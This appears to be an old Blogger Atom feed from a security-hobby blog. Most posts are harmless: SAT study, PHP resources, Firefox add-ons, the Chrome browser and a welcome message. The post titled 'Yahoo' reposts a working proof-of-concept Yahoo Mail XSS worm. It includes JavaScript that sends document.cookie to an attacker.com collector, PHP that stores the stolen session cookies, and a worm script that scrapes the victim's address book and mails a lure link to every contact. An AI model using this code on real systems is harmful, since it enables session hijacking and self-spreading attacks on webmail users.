<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5503068606766876320</id><updated>2011-04-21T21:44:08.628-07:00</updated><category term='mylife'/><category term='worm'/><category term='firefox'/><category term='yahoo'/><category term='blognews'/><category term='googlechrome'/><category term='php'/><title type='text'>therisingexploitation</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>6</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-953577051121067823</id><published>2008-10-11T21:55:00.000-07:00</published><updated>2008-10-11T21:58:52.544-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mylife'/><title type='text'>Time to hit the books</title><content type='html'>&lt;div style="text-align: justify;"&gt;Ive recently purchased this book "The Official SAT Study Guide" and I do have alot of reading and studying to do which I admit I hate sutdying. But I will have to take some time to sit down and read this and do a few notes its going to be a b*tch but I want to goto college sense my current life is not the best. But if your going to take this test soon I recommend purchasing this book and hit the books!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-953577051121067823?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/953577051121067823/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=953577051121067823' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/953577051121067823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/953577051121067823'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/time-to-hit-books.html' title='Time to hit the books'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-3796000239744011415</id><published>2008-10-11T21:19:00.000-07:00</published><updated>2008-10-11T21:26:36.022-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='php'/><title type='text'>php for beginners</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i34.tinypic.com/257n2n7.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://i34.tinypic.com/257n2n7.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;a href="http://www.php.net/"&gt;php&lt;/a&gt;  is a widely know programming language its a good thing to know these days because coporations are looking for decent programmers. Now the good thing about php is you can do various things with it. Theres also a nice little side scripting language that goes with php that is called &lt;a href="http://en.wikipedia.org/wiki/Curl_programming_language"&gt;cURL&lt;/a&gt;. So here are some good links to learn PHP and cURL so check it out!&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;www.phpvideotutorials.com&lt;/div&gt;&lt;div&gt;www.php.net&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.w3schools.com/PHP/DEfaULT.asP"&gt;www.w3schools.com/PHP/DEfaULT.asP&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;www.killerphp.net&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy and learn something new now it will take a few weeks to grasp the language just practice and set goals.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-3796000239744011415?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/3796000239744011415/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=3796000239744011415' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/3796000239744011415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/3796000239744011415'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/php-for-beginners.html' title='php for beginners'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i34.tinypic.com/257n2n7_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-7651604898662445554</id><published>2008-10-10T16:15:00.000-07:00</published><updated>2008-10-11T21:03:43.667-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='firefox'/><title type='text'>FireFox One Oh One</title><content type='html'>I thought I would share some good add-ons that will help your FireFox security and overall performance.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;FlashBlock:&lt;br /&gt;&lt;/span&gt;Never be annoyed by a Flash animation again! Blocks Flash so it won't get in your way, but if you want to see it, just click on...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/433"&gt;addon &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;NoScript:&lt;br /&gt;&lt;/span&gt;The best security you can get in a web browser!&lt;br /&gt;Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks.&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/722"&gt;addon&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;TrackMeNot:&lt;/span&gt;&lt;br /&gt;Protects users against search data profiling...&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/3173"&gt;addon&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Well there are three add-ons I enjoy and enhance my FireFox browser security so feel free to add them and have fun.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-7651604898662445554?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/7651604898662445554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=7651604898662445554' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/7651604898662445554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/7651604898662445554'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/firefox-one-oh-one.html' title='FireFox One Oh One'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-5758249869658370729</id><published>2008-10-10T15:55:00.000-07:00</published><updated>2008-10-11T21:03:29.818-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='googlechrome'/><title type='text'>Chrome browser still making an impact</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i33.tinypic.com/11a8nsj.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://i33.tinypic.com/11a8nsj.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As we all know the Chrome browser has been out for sometime now and when it first hit the internet it was a big hit. Millions of people fell in love with the browser I watched several forums get set up dedicated to the browser. Now there has been firefox add-on releases to make your firefox browser look like the Chrome browser.&lt;br /&gt;&lt;br /&gt;Now I don't see the point in it you still don't get the speed and whit of the Chrome browser.&lt;br /&gt;We all love the speed and the options for the Chrome browser such as if a flash or video item is freezing the page it will take that out of the page and undo the freeze nice feature right. And the fact that the Chrome browser is in its beta stage is amazing I cannot wait until the full version is released.&lt;br /&gt;&lt;br /&gt;There were big exploits that were released when the Chrome browser hit the market at first but they have been fixed. Just make sure to update your browser and happy surfing, if you do use the Chrome browser as your main browser then please watch what websites you search remember its still in the beta stage. Download The Chrome Browser &lt;a href="http://www.google.com/chrome"&gt;Here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-5758249869658370729?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/5758249869658370729/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=5758249869658370729' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/5758249869658370729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/5758249869658370729'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/chrome-browser-still-making-impact.html' title='Chrome browser still making an impact'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i33.tinypic.com/11a8nsj_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-4184099939226097499</id><published>2008-10-10T15:34:00.000-07:00</published><updated>2008-10-11T21:03:34.510-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='yahoo'/><category scheme='http://www.blogger.com/atom/ns#' term='worm'/><title type='text'>Yahoo</title><content type='html'>&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;found this while browsing the web; enjoy the read&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Proof of Concept yahoo worm by -Gonzalez&lt;br /&gt;&lt;br /&gt;1. &lt;span style="font-weight: bold;"&gt;DESCRIPTION&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Using Cross Site Scripting ( XSS ) attack's give's us the possiblity to impersone one legitim user ( victim ) that is a registered on a website ( target )&lt;br /&gt;&lt;br /&gt;In this tutorial will suppose the target site has a XSS vulnerability which give's an attacker to inject a "bad code" into a page.&lt;br /&gt;&lt;br /&gt;First, let's follow this step's :&lt;br /&gt;&lt;br /&gt;a. The victim certify's on the target site&lt;br /&gt;b. The attacker send's a link to a page ( with the "bad code" ) from the target site to the victim&lt;br /&gt;c. The victim navigate's to the page&lt;br /&gt;d. The page code load's a script from another location sending the victim's cookies&lt;br /&gt;e. The script use's this cookie to act like the victim on target site&lt;br /&gt;&lt;br /&gt;I'll illustrate now ( with example's ) :&lt;br /&gt;&lt;br /&gt;We suppose the victim is allready certifyed on the target site&lt;br /&gt;&lt;br /&gt;The target has a XSS vulnerability :&lt;br /&gt;http://www.target.com/page.php?var=&lt;br /&gt;&lt;br /&gt;The attacker send's the link to his victim :&lt;br /&gt;"http://www.target.com/page.php?var="&lt;br /&gt;&lt;br /&gt;When the victim follow's the link; the script "js.js" is loaded and executed by the browser&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;===== js.js =====&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);&lt;br /&gt;&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;The file "js.js" contain's a code which does a request to the file "php.php" - controled by the attacker.&lt;br /&gt;&lt;br /&gt;===== &lt;span style="font-weight: bold;"&gt;php.php&lt;/span&gt; =====&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;span style="font-size:100%;"&gt;$domain=".target.com"; // cookie domain&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$cookie=$_GET['cookie'];&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//we create the file , supposeing the cookie session has more sequence's "name=value; "&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$hcook=fopen("cookie.txt","w");&lt;br /&gt;&lt;br /&gt;$params=split('; ',$cookie);&lt;br /&gt;&lt;br /&gt;for($i=0; $i&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$eqpos=strpos($params[$i],"=");&lt;br /&gt;&lt;br /&gt;$name =substr($params[$i],0,$eqpos);&lt;br /&gt;&lt;br /&gt;$value=substr($params[$i],$eqpos+1,strlen($params[$i]));&lt;br /&gt;&lt;br /&gt;fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;fclose($hcook);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;br /&gt;The "php.php" file is esential to this kind of attack.&lt;br /&gt;This steal's the victim's cookie and use's it to look like the victim on the target site.&lt;br /&gt;The reason for useing a php script in place of a javascript is to pass the javascript polics, haveing the possibility if requesting to anykind of domain where the cookie is valid.&lt;br /&gt;We can receive and send data to the target site and manipulate in any kind of mode.&lt;br /&gt;&lt;br /&gt;2. &lt;span style="font-weight: bold;"&gt;YAHOO! MAIL Worm PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Will suppose that Yahoo! has a XSS vulnerability like the following form :&lt;br /&gt;"http://xxx.yahoo.com/page?var="&lt;br /&gt;&lt;br /&gt;a. The attacker send's an emails containing the link to http://xxx.yahoo.com/page?var= to the victim&lt;br /&gt;b. The victim follow's the link ( Ok, pause. Let's name the victim BILL )&lt;br /&gt;c. "worm.php" file is stealing BILL's cookie and useing it to send a mail to every person from his Address Book&lt;br /&gt;d. The person's from BILL's Address Book become victim's when they follow the link from the email, which seeming to come from a victim&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;===== worm.php =====&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-size:100%;"&gt;$subject="Link for you"; // message subject&lt;br /&gt;&lt;br /&gt;$message ="Look a cool link, CLICK ME!"; // message body&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// We eliminate the need of a "js.js" file checking the parameter value of "cookie"&lt;br /&gt;&lt;br /&gt;// If this doesn't exist we type the content of "js.js" file&lt;br /&gt;&lt;br /&gt;// and if exist's we continue with "php.php"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(!isset($_GET['cookie']))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$scripturl="http://".$HTTP_HOST.$REQUEST_URI;&lt;br /&gt;&lt;br /&gt;print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$cookie=$_GET['cookie'];&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// We create a unique name for the file were we'll save the cookie ensureing this way&lt;br /&gt;&lt;br /&gt;// that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite&lt;br /&gt;&lt;br /&gt;$cookiefile=rand(100,999).".txt";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// we create the cookie file&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$hcook=fopen($cookiefile,"w");&lt;br /&gt;&lt;br /&gt;$params=split('; ',$cookie);&lt;br /&gt;&lt;br /&gt;for($i=0; $i&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$eqpos=strpos($params[$i],"=");&lt;br /&gt;&lt;br /&gt;$name =substr($params[$i],0,$eqpos);&lt;br /&gt;&lt;br /&gt;$value= substr($params[$i],$eqpos+1,strlen($params[$i]));&lt;br /&gt;&lt;br /&gt;fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;fclose($hcook);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// We try the Yahoo! address book for data extraction all about the contact's and create a variable of  the form&lt;br /&gt;&lt;br /&gt;// "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com&lt;br /&gt;&lt;br /&gt;// which change's each time there is a certify!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$address=curl("http://address.mail.yahoo.com/","",$cookiefile);&lt;br /&gt;&lt;br /&gt;if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$apage=explode(" ",$address);&lt;br /&gt;&lt;br /&gt;foreach($apage as $line_num =&gt; $aline)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if(strstr($aline,"ymsgr:sendIM"))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$ex =explode("?",$aline);&lt;br /&gt;&lt;br /&gt;$ex2=explode(""",$ex[1]);&lt;br /&gt;&lt;br /&gt;$id=$ex2[0];&lt;br /&gt;&lt;br /&gt;$to=$to.$ex2[0]."@yahoo.com,";&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if(strstr($aline,"Compose"))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$ex3=explode("/",$aline);&lt;br /&gt;&lt;br /&gt;$domain="http://".$ex3[2];&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action&lt;br /&gt;&lt;br /&gt;// to send email and parameter value ".crumb" which we need for sending message's&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(strlen($to)&gt;0 &amp;amp;&amp;amp; strlen($domain)&gt;0) // if we have the 2 variable's&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$compose= curl($domain."/ym/Compose?","",$cookiefile);&lt;br /&gt;&lt;br /&gt;if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$cpage=explode(" ",$compose);&lt;br /&gt;&lt;br /&gt;foreach($cpage as $line_num =&gt; $cline)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;if(strstr($cline,"form name="Compose""))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$ex4=explode(""",$cline);&lt;br /&gt;&lt;br /&gt;$action=$ex4[5];&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if(strstr($cline,".crumb"))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$ex6=explode(""",$cline);&lt;br /&gt;&lt;br /&gt;$crumb=$ex6[3];&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(strlen($action)&gt;0 &amp;amp;&amp;amp; strlen($crumb)&gt;0) // if we have the 2 variable's&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$subject=str_replace(" ","+",$subject);&lt;br /&gt;&lt;br /&gt;$message=str_replace(" ","+",$message);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// we generate POSTFIELDS for curl&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$post ="SEND=1&amp;amp;SD=&amp;amp;SC=&amp;amp;CAN=&amp;amp;docCharset= iso-8859-1&amp;amp;PhotoMailUser=&amp;amp;PhotoToolInstall=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="OpenInsertPhoto=&amp;amp;PhotoGetStart= 0&amp;amp;SaveCopy=no&amp;amp;PhotoMailInstallOrigin=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="box=&amp;amp;.crumb=".$crumb."&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="FwdFile=&amp;amp;FwdMsg=&amp;amp;FwdSubj=&amp;amp;FwdInline= &amp;amp;OriginalFrom=&amp;amp;OriginalSubject=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="InReplyTo=&amp;amp;NumAtt=0&amp;amp;AttData=&amp;amp;UplData= &amp;amp;OldAttData=&amp;amp;OldUplData=&amp;amp;FName=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="ATT=&amp;amp;VID=&amp;amp;Markers=&amp;amp;NextMarker= 0&amp;amp;Thumbnails=&amp;amp;PhotoMailWith=&amp;amp;BrowseState=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="PhotoIcon=&amp;amp;ToolbarState=&amp;amp;VirusReport= &amp;amp;Attachments=&amp;amp;BGRef=&amp;amp;BGDesc=&amp;amp;BGDef=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="BGFg=&amp;amp;BGFF=&amp;amp;BGFS=&amp;amp;BGSolid=&amp;amp;BGCustom= &amp;amp;PlainMsg=&amp;amp;PhotoFrame=&amp;amp;PhotoPrintAtHomeLink=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="PhotoSlideShowLink=&amp;amp;PhotoPrintLink= &amp;amp;PhotoSaveLink=&amp;amp;PhotoPermCap=&amp;amp;PhotoPermPath=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="PhotoDownloadUrl=&amp;amp;PhotoSaveUrl= &amp;amp;PhotoFlags=&amp;amp;start=compose&amp;amp;bmdomain=&amp;amp;hidden=showcc&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="showbcc=&amp;amp;AC_Done=&amp;amp;AC_ToList= &amp;amp;AC_CcList=&amp;amp;AC_BccList=&amp;amp;sendtop=Send&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="savedrafttop=Save+as+a+Draft&amp;amp;canceltop= Cancel&amp;amp;To=".$to."&amp;amp;Cc=&amp;amp;Bcc=&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="Subj=".$subject."&amp;amp;Body=".$message."&amp;amp;Format= html&amp;amp;SigAtt=1&amp;amp;sendbottom=Send&amp;amp;";&lt;br /&gt;&lt;br /&gt;$post.="savedraftbottom=Save+as+a+Draft&amp;amp;cancelbottom=Cancel&amp;amp;";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// sending the mail's&lt;br /&gt;&lt;br /&gt;$mail=curl($domain.$action,$post,$cookiefile);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;unlink($cookiefile);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function curl($url,$post='',$cookiefile) // function to easy the curl request's&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$rand=rand(100000,400000);&lt;br /&gt;&lt;br /&gt;$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";&lt;br /&gt;&lt;br /&gt;$ch=curl_init();&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_URL,$url);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_USERAGENT,$agent);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);&lt;br /&gt;&lt;br /&gt;if($post!=='')&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_POST,1);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_POSTFIELDS,$post);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);&lt;br /&gt;&lt;br /&gt;curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);&lt;br /&gt;&lt;br /&gt;$result=curl_exec($ch);&lt;br /&gt;&lt;br /&gt;curl_close($ch);&lt;br /&gt;&lt;br /&gt;if($result=="") { curl($url,$post); } else { return $result; }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;===================&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The impact of this kind of worm can be huge!&lt;br /&gt;&lt;br /&gt;Thank's for reading and hope you learned something &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-4184099939226097499?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/4184099939226097499/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=4184099939226097499' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/4184099939226097499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/4184099939226097499'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/yahoo.html' title='Yahoo'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5503068606766876320.post-6806097670242286586</id><published>2008-10-09T21:59:00.000-07:00</published><updated>2008-10-11T21:03:05.124-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='blognews'/><title type='text'>therisingexploitation</title><content type='html'>&lt;span style="font-size:85%;"&gt;Hello and welcome to therisingexploitation I will be blogging about my general interest in security and the latest things going around. I will try to provide some code for each post but if I can't I will try to provide some examples. So if you want good content its going to be some time before new post are made but this blog will be active.&lt;br /&gt;          If you wish to submit some content to the blog or ask a question and have us answer it on the blog them message us here &lt;b&gt;therisingexploitation@gmail.com&lt;/b&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5503068606766876320-6806097670242286586?l=therisingexploitation.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://therisingexploitation.blogspot.com/feeds/6806097670242286586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5503068606766876320&amp;postID=6806097670242286586' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5503068606766876320/posts/default/6806097670242286586'/><link rel='self' type='application/atom+xml' 